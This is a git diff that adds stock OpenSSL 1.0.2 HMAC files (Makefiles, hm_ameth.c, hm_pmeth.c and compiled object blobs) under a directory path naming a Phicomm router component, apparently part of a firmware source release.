+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+hm_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+hm_ameth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+hm_ameth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+hm_ameth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+hm_ameth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+hm_ameth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+hm_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+hm_ameth.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+hm_ameth.o: ../../include/openssl/symhacks.h ../asn1/asn1_locl.h ../cryptlib.h
+hm_ameth.o: hm_ameth.c
+hm_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+hm_pmeth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+hm_pmeth.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+hm_pmeth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+hm_pmeth.o: ../../include/openssl/evp.h ../../include/openssl/hmac.h
+hm_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+hm_pmeth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+hm_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+hm_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+hm_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+hm_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+hm_pmeth.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+hm_pmeth.o: ../cryptlib.h ../evp/evp_locl.h hm_pmeth.c
+hmac.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+hmac.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+hmac.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+hmac.o: ../../include/openssl/evp.h ../../include/openssl/hmac.h
+hmac.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+hmac.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+hmac.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+hmac.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+hmac.o: ../../include/openssl/symhacks.h ../cryptlib.h hmac.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/Makefile.save
new file mode 100644
index 0000000..da49b3b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/Makefile.save
@@ -0,0 +1,108 @@
+#
+# OpenSSL/crypto/md/Makefile
+#
+
+DIR=	hmac
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=hmactest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=hmac.c hm_ameth.c hm_pmeth.c
+LIBOBJ=hmac.o hm_ameth.o hm_pmeth.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= hmac.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+hm_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+hm_ameth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+hm_ameth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+hm_ameth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+hm_ameth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+hm_ameth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+hm_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+hm_ameth.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+hm_ameth.o: ../../include/openssl/symhacks.h ../asn1/asn1_locl.h ../cryptlib.h
+hm_ameth.o: hm_ameth.c
+hm_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+hm_pmeth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+hm_pmeth.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+hm_pmeth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+hm_pmeth.o: ../../include/openssl/evp.h ../../include/openssl/hmac.h
+hm_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+hm_pmeth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+hm_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+hm_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+hm_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+hm_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+hm_pmeth.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+hm_pmeth.o: ../cryptlib.h ../evp/evp_locl.h hm_pmeth.c
+hmac.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+hmac.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+hmac.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+hmac.o: ../../include/openssl/evp.h ../../include/openssl/hmac.h
+hmac.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+hmac.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+hmac.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+hmac.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+hmac.o: ../../include/openssl/symhacks.h ../cryptlib.h hmac.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hm_ameth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hm_ameth.c
new file mode 100644
index 0000000..29b2b5d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hm_ameth.c
@@ -0,0 +1,162 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2007.
+ */
+/* ====================================================================
+ * Copyright (c) 2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include "asn1_locl.h"
+
+#define HMAC_TEST_PRIVATE_KEY_FORMAT
+
+/*
+ * HMAC "ASN1" method. This is just here to indicate the maximum HMAC output
+ * length and to free up an HMAC key.
+ */
+
+static int hmac_size(const EVP_PKEY *pkey)
+{
+    return EVP_MAX_MD_SIZE;
+}
+
+static void hmac_key_free(EVP_PKEY *pkey)
+{
+    ASN1_OCTET_STRING *os = (ASN1_OCTET_STRING *)pkey->pkey.ptr;
+    if (os) {
+        if (os->data)
+            OPENSSL_cleanse(os->data, os->length);
+        ASN1_OCTET_STRING_free(os);
+    }
+}
+
+static int hmac_pkey_ctrl(EVP_PKEY *pkey, int op, long arg1, void *arg2)
+{
+    switch (op) {
+    case ASN1_PKEY_CTRL_DEFAULT_MD_NID:
+        *(int *)arg2 = NID_sha256;
+        return 1;
+
+    default:
+        return -2;
+    }
+}
+
+#ifdef HMAC_TEST_PRIVATE_KEY_FORMAT
+/*
+ * A bogus private key format for test purposes. This is simply the HMAC key
+ * with "HMAC PRIVATE KEY" in the headers. When enabled the genpkey utility
+ * can be used to "generate" HMAC keys.
+ */
+
+static int old_hmac_decode(EVP_PKEY *pkey,
+                           const unsigned char **pder, int derlen)
+{
+    ASN1_OCTET_STRING *os;
+    os = ASN1_OCTET_STRING_new();
+    if (!os || !ASN1_OCTET_STRING_set(os, *pder, derlen))
+        return 0;
+    EVP_PKEY_assign(pkey, EVP_PKEY_HMAC, os);
+    return 1;
+}
+
+static int old_hmac_encode(const EVP_PKEY *pkey, unsigned char **pder)
+{
+    int inc;
+    ASN1_OCTET_STRING *os = (ASN1_OCTET_STRING *)pkey->pkey.ptr;
+    if (pder) {
+        if (!*pder) {
+            *pder = OPENSSL_malloc(os->length);
+            inc = 0;
+        } else
+            inc = 1;
+
+        memcpy(*pder, os->data, os->length);
+
+        if (inc)
+            *pder += os->length;
+    }
+
+    return os->length;
+}
+
+#endif
+
+const EVP_PKEY_ASN1_METHOD hmac_asn1_meth = {
+    EVP_PKEY_HMAC,
+    EVP_PKEY_HMAC,
+    0,
+
+    "HMAC",
+    "OpenSSL HMAC method",
+
+    0, 0, 0, 0,
+
+    0, 0, 0,
+
+    hmac_size,
+    0,
+    0, 0, 0, 0, 0, 0, 0,
+
+    hmac_key_free,
+    hmac_pkey_ctrl,
+#ifdef HMAC_TEST_PRIVATE_KEY_FORMAT
+    old_hmac_decode,
+    old_hmac_encode
+#else
+    0, 0
+#endif
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hm_ameth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hm_ameth.o
new file mode 100644
index 0000000000000000000000000000000000000000..2a62a294b8c1cfb473b97eeae6ff1a5ed611b9ce
GIT binary patch
literal 3328
zcmds4&2Jl35P$Xt;x=LH@)-z1dnjLmuI#o50ixJ(H+dCK9Ac-WlxVftEOk|T9qhG8
z0)<K@l`MnA$CZN*95`_3G2(zMwNg1&`~ygw_%0|CNQgGfJim!wHZ}*iG17YG{pRD%
z&d$6izhh-5qmc+Bim>CXw;~kyzMh;CVv5Dt0k(DEp+7efxFV!m+uPfXTUveOTBIFi
zY!gEX&3yhP-l`aU<M-eN-Z;*9b4w`e_qQ&vFV?|~zyB2cvhVPRH??GkyVH!f>M`DW
zZtK&HPB6?}i}8rove+wU7Dd!_VV*Z{<{=nw{1k5%4vh-;76^Q!Qy)rpeteX-j`HTU
zlg+C_1#y1JHoyJyWes<^Auy2$Z(NO^Sxmp$&9<BC&%rovU5N3G?O-2w>y+D##qTl6
z#Vf_K?UcQsXu6C~r!y?K;`#Y}*1&~<ipnw?{u5yy`225ZDwBEEcx-;D?gw?_8S|)_
zIGlXCE|$r+k0i{*vB$e`_l<{u#o@UPo~fC622ImJj7oAh$Vid(ITl%sN5)5oV;?|Q
zq0fUt!`Obw5lcw<0m%;mKOyB)$Spm7DVo;D8d_R6qFH?`t;f@P>`73Sq}>AYNj?4^
z+FjC4=tg5`N>9Mb008VK^ce2_iL`$Lxrl4;*JIWQgp-=R3<qL}{kFYVgYVpT@&Ko5
z?Do<iQkX^oh$?ZYHup-L)>I$#*F^PE>e0g>VjQd=lBgYUoKeJaVv$6xfLrh&{xyO?
zq9$Dt;@>W%-Aq#t6-A}(d{G4iQDY;!0a)b)g59&1G`9CUV7}NVVe$d!hrcxd|7ZaI
z*#LZV0RGhg{2RazDs{UKYeCAHQ!G2KT|2k#F(Iv-_ttDTsFqlzv}_B=^WDm_*IO@p
zVl8xN{aV%Yn3>Ham_3!vO{BASZgMhj73@NKB5T<!Gk1Enkh9B9sZ?=UIzN-NbD09@
z^M$#SGgG$jz0n7)c>%Ld&DygsTBmKNRy%jrXSrEx298GCEqRV#^ZIy+TtsG0%}?5R
ze8LM)%h!f;0d5<{{(=hzX-?ue0e33+hYEg|f`6{yc&1RCj)LE#;J+w1&JNlCq2Tu^
zIQ0%r@Gv~osbkWfaI&MhK^)(Ws4WG;X`ZmJkO-$azTAa(aGFc(HzcyBIW`2^-BaE7
zSO};1JcLu6l@Lz*wnI4O&&=9dIdGPM2h}bwl2r9djv08X0W+7Kz+vW6t;Wo11s7<Z
zG?TDIBY}VfN)tNLDKXQnl*^tEu6`x(Ot?Z0*8;~qFV|=Ny17!Vta#O6O~&ww(Dra`
z%S8VpGr%8f96sSvfFa%NvYlVFRcRa+*uyCm1i38((s#cDF!YT{JL;=PBp$vYo)2#%
z{lYNbdl>WI`X}Z7M`V0rv_JI=;j}+-yf;t|?|)GmTqj4#jnFy;>wfj)ID|lI{jj9r
z`r#bnRtb1inw7($-eahzyooysrux6B4ws@JKZ0Hd0aFc|UzC7BhLThM1UEszm|_36
z1n3+f`>_AJpy*e>UuFGPr6cwqo@wMy{nu}AbXkxebV25!19q^FKmM%<e|vz~WqGC3
YIgA)mxPBP3pMOy%`mylp{e=Dh2By?)D*ylh

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hm_pmeth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hm_pmeth.c
new file mode 100644
index 0000000..0ffff79
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hm_pmeth.c
@@ -0,0 +1,262 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2007.
+ */
+/* ====================================================================
+ * Copyright (c) 2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/evp.h>
+#include <openssl/hmac.h>
+#include "evp_locl.h"
+
+/* HMAC pkey context structure */
+
+typedef struct {
+    const EVP_MD *md;           /* MD for HMAC use */
+    ASN1_OCTET_STRING ktmp;     /* Temp storage for key */
+    HMAC_CTX ctx;
+} HMAC_PKEY_CTX;
+
+static int pkey_hmac_init(EVP_PKEY_CTX *ctx)
+{
+    HMAC_PKEY_CTX *hctx;
+    hctx = OPENSSL_malloc(sizeof(HMAC_PKEY_CTX));
+    if (!hctx)
+        return 0;
+    hctx->md = NULL;
+    hctx->ktmp.data = NULL;
+    hctx->ktmp.length = 0;
+    hctx->ktmp.flags = 0;
+    hctx->ktmp.type = V_ASN1_OCTET_STRING;
+    HMAC_CTX_init(&hctx->ctx);
+
+    ctx->data = hctx;
+    ctx->keygen_info_count = 0;
+
+    return 1;
+}
+
+static int pkey_hmac_copy(EVP_PKEY_CTX *dst, EVP_PKEY_CTX *src)
+{
+    HMAC_PKEY_CTX *sctx, *dctx;
+    if (!pkey_hmac_init(dst))
+        return 0;
+    sctx = src->data;
+    dctx = dst->data;
+    dctx->md = sctx->md;
+    HMAC_CTX_init(&dctx->ctx);
+    if (!HMAC_CTX_copy(&dctx->ctx, &sctx->ctx))
+        return 0;
+    if (sctx->ktmp.data) {
+        if (!ASN1_OCTET_STRING_set(&dctx->ktmp,
+                                   sctx->ktmp.data, sctx->ktmp.length))
+            return 0;
+    }
+    return 1;
+}
+
+static void pkey_hmac_cleanup(EVP_PKEY_CTX *ctx)
+{
+    HMAC_PKEY_CTX *hctx = ctx->data;
+    HMAC_CTX_cleanup(&hctx->ctx);
+    if (hctx->ktmp.data) {
+        if (hctx->ktmp.length)
+            OPENSSL_cleanse(hctx->ktmp.data, hctx->ktmp.length);
+        OPENSSL_free(hctx->ktmp.data);
+        hctx->ktmp.data = NULL;
+    }
+    OPENSSL_free(hctx);
+}
+
+static int pkey_hmac_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    ASN1_OCTET_STRING *hkey = NULL;
+    HMAC_PKEY_CTX *hctx = ctx->data;
+    if (!hctx->ktmp.data)
+        return 0;
+    hkey = ASN1_OCTET_STRING_dup(&hctx->ktmp);
+    if (!hkey)
+        return 0;
+    EVP_PKEY_assign(pkey, EVP_PKEY_HMAC, hkey);
+
+    return 1;
+}
+
+static int int_update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    HMAC_PKEY_CTX *hctx = ctx->pctx->data;
+    if (!HMAC_Update(&hctx->ctx, data, count))
+        return 0;
+    return 1;
+}
+
+static int hmac_signctx_init(EVP_PKEY_CTX *ctx, EVP_MD_CTX *mctx)
+{
+    HMAC_PKEY_CTX *hctx = ctx->data;
+    HMAC_CTX_set_flags(&hctx->ctx, mctx->flags & ~EVP_MD_CTX_FLAG_NO_INIT);
+    EVP_MD_CTX_set_flags(mctx, EVP_MD_CTX_FLAG_NO_INIT);
+    mctx->update = int_update;
+    return 1;
+}
+
+static int hmac_signctx(EVP_PKEY_CTX *ctx, unsigned char *sig, size_t *siglen,
+                        EVP_MD_CTX *mctx)
+{
+    unsigned int hlen;
+    HMAC_PKEY_CTX *hctx = ctx->data;
+    int l = EVP_MD_CTX_size(mctx);
+
+    if (l < 0)
+        return 0;
+    *siglen = l;
+    if (!sig)
+        return 1;
+
+    if (!HMAC_Final(&hctx->ctx, sig, &hlen))
+        return 0;
+    *siglen = (size_t)hlen;
+    return 1;
+}
+
+static int pkey_hmac_ctrl(EVP_PKEY_CTX *ctx, int type, int p1, void *p2)
+{
+    HMAC_PKEY_CTX *hctx = ctx->data;
+    ASN1_OCTET_STRING *key;
+    switch (type) {
+
+    case EVP_PKEY_CTRL_SET_MAC_KEY:
+        if ((!p2 && p1 > 0) || (p1 < -1))
+            return 0;
+        if (!ASN1_OCTET_STRING_set(&hctx->ktmp, p2, p1))
+            return 0;
+        break;
+
+    case EVP_PKEY_CTRL_MD:
+        hctx->md = p2;
+        break;
+
+    case EVP_PKEY_CTRL_DIGESTINIT:
+        key = (ASN1_OCTET_STRING *)ctx->pkey->pkey.ptr;
+        if (!HMAC_Init_ex(&hctx->ctx, key->data, key->length, hctx->md,
+                          ctx->engine))
+            return 0;
+        break;
+
+    default:
+        return -2;
+
+    }
+    return 1;
+}
+
+static int pkey_hmac_ctrl_str(EVP_PKEY_CTX *ctx,
+                              const char *type, const char *value)
+{
+    if (!value) {
+        return 0;
+    }
+    if (!strcmp(type, "key")) {
+        void *p = (void *)value;
+        return pkey_hmac_ctrl(ctx, EVP_PKEY_CTRL_SET_MAC_KEY, -1, p);
+    }
+    if (!strcmp(type, "hexkey")) {
+        unsigned char *key;
+        int r;
+        long keylen;
+        key = string_to_hex(value, &keylen);
+        if (!key)
+            return 0;
+        r = pkey_hmac_ctrl(ctx, EVP_PKEY_CTRL_SET_MAC_KEY, keylen, key);
+        OPENSSL_free(key);
+        return r;
+    }
+    return -2;
+}
+
+const EVP_PKEY_METHOD hmac_pkey_meth = {
+    EVP_PKEY_HMAC,
+    0,
+    pkey_hmac_init,
+    pkey_hmac_copy,
+    pkey_hmac_cleanup,
+
+    0, 0,
+
+    0,
+    pkey_hmac_keygen,
+
+    0, 0,
+
+    0, 0,
+
+    0, 0,
+
+    hmac_signctx_init,
+    hmac_signctx,
+
+    0, 0,
+
+    0, 0,
+
+    0, 0,
+
+    0, 0,
+
+    pkey_hmac_ctrl,
+    pkey_hmac_ctrl_str
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hm_pmeth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hm_pmeth.o
new file mode 100644
index 0000000000000000000000000000000000000000..ea6fc4df1ae16032b8ca784f9ee1b45f6aa2c2dc
GIT binary patch
literal 5456
zcmds)e{5Sv9l$Sk(z>I(xFs;dpnHroct2{z%@D9@TV5O|XVppE+9_Mp?9FxD#H#Ih
z@iQc)qZHSj9&bif*`)2CfrK>i$AtC=L)8Sup@qPN=;%QF5~4`c$dpPO8ii<OHQ(>O
zJLmF}Cn514U+KNO``q{Yz3+YR{O)`*8XxkswGkn0<Uz955|og{j<tF}tM(H==_K!V
z?t0IBhnm0A5^-xRSY6#>?5M78HF~S7ZAQ=eo6Tl(Wk0R`qVws++Lg|4HBK*9`m66X
zPuw4?FZh<x(MnIu+_tiZTEqUhHS8Oy?^k2iwz&B_YW1tsD)}rw)2lT)pJ{adpt0f!
zHx6CIakW&;T&3paBsE{B)oZ~K>#-m;jc(r*wc2+F!8bJry940{v!~{gU0R?~Yb>;f
z8!I9DEH%C7al*9rPvdr4Pjz?2>L<EYKBVzSYp}bkrDMgr15>nbJ9BPy*#4@Qf)m<d
z77;}9F11busr5xatuCqb)SFF60U!S_7cjMUqu%iW7GEUDMxS8j2}lA=c|M4?Oz)7G
zHS1@tt0(=$xO*H_eAK+oUH>H9ptUQ;&I@1g;;i3hn0cPO7;Z4*aca#5Y5fV?F}0rX
z(^}KmMKcv2Or6gKsO@nn>WBEy)#O`P!F-QX^Zi#wk=8$hEcxSpn9qJ50*pgze=;7h
zv$+IupyHQRx_I>tx)kB=B0i`Gu#cNf+6h>SQiO*lCRwoBL2X=1MZ<5vJg-5@rS<f&
zsdk>Of;uE1X5QrC#LVA{nb#VXK-_$*`fBsS7Ep_u|5{GI-)w5;rIj(REmVPlb{{q0
zjPtZn^QW}dFnX-6ZZM?gBJ;7l6C8jM=(EUIwrD@Z-A!SGz=rFyH=M|0^-^HaygI2J
z)+V(_?HQ#Yeb-@w+*p1I>|jjXfFsl@z;2m<CraY=j2bup2D{D9O}&CmR)=_gO|6Q*
zwN<;UaUW#Y{t1aqG64f#oGIv~Le`iGWyrDY0-4FqW8o&aU;eLTI1;%}4UQkF6pf1d
z`A}b|cTf1U71j)YWp8h&_ue~gY|pwK3f!6<@C=WR6AvK`WFjqHP)BJyet@*i``d2Y
zzSVaYc0KZsvmQd`vD~NlJ$c2~4b^)&KZoUz;(y9BtOTmwVWr=5TnT83e?al!Pv9`u
zdkD*@;;(uZ6dzR4H}eUl3J>-jfF86ti*1kx@Rd;fXFNH@r~Qoey@(8C0AFBp#xu|S
zVN5?q267BvtS^Bv4JoQ;gvF#OK8*Vv><77mFNpmco&hCL_YNrPQ|*IF@Jz=b%;IGw
zIH;)5F~H^$1l1tq1f_s4HfK!<obiHMwcYcmm^F58E@<9P{@&cI*SqP7gli;LX}y&f
zJUL}M0FUHH<o7ntMVqY|Fq{+W-@@m`)(F^roX0p<p^XxS2laEDv-JUXkn<NfXKMot
z#mjb`T^H{esGy%^uFuvB*q1m@!UjcQ>jUN2;X(b~JQXber~u+6`0?8)Ub1Z?1mY#P
zxNtnH*2{COiNBil@;qyH5U0g=IPYAq&RSmL+d#hygdG`<o(nGgH!l3IF8pm5e#3=t
zf%Vudo?Bh`T`v3~7rxJhr(O8tF8pgQ{G1Da-i5#D!e4RWi!S`K3;#3l9n$`M4f4)J
zI=)J9aOpFJbVkn@b9usQ<=k{JW6ZB>=(%FfAi1KUS4vZ9BTLo{!NYX6D1l5qn=V#L
z5@E(`7C4k%Hs&Oa%xr0agyNB2e1-9~m*~Usu>mcvj|~kaqbWV54aB25(UPNKeJqj!
zl1v?ljSlPOtU>6A7SUr6qn@27(Sr$nWKfT!9@Yy}qE*fv&)RB3xnep`bci6GIi_c3
zj_F6!xxC$nHsDV`nom!ch3R_8h8nlCurZh^m^hA~*cW|7PnR*5Yo0}B#uCxdWHPR^
zb~#HT2OdeJ#`L3e*;c)f&gW+{Yo;uPkh4soM4-qOr*&gihnvTm3d<o|L6&N~ps?kB
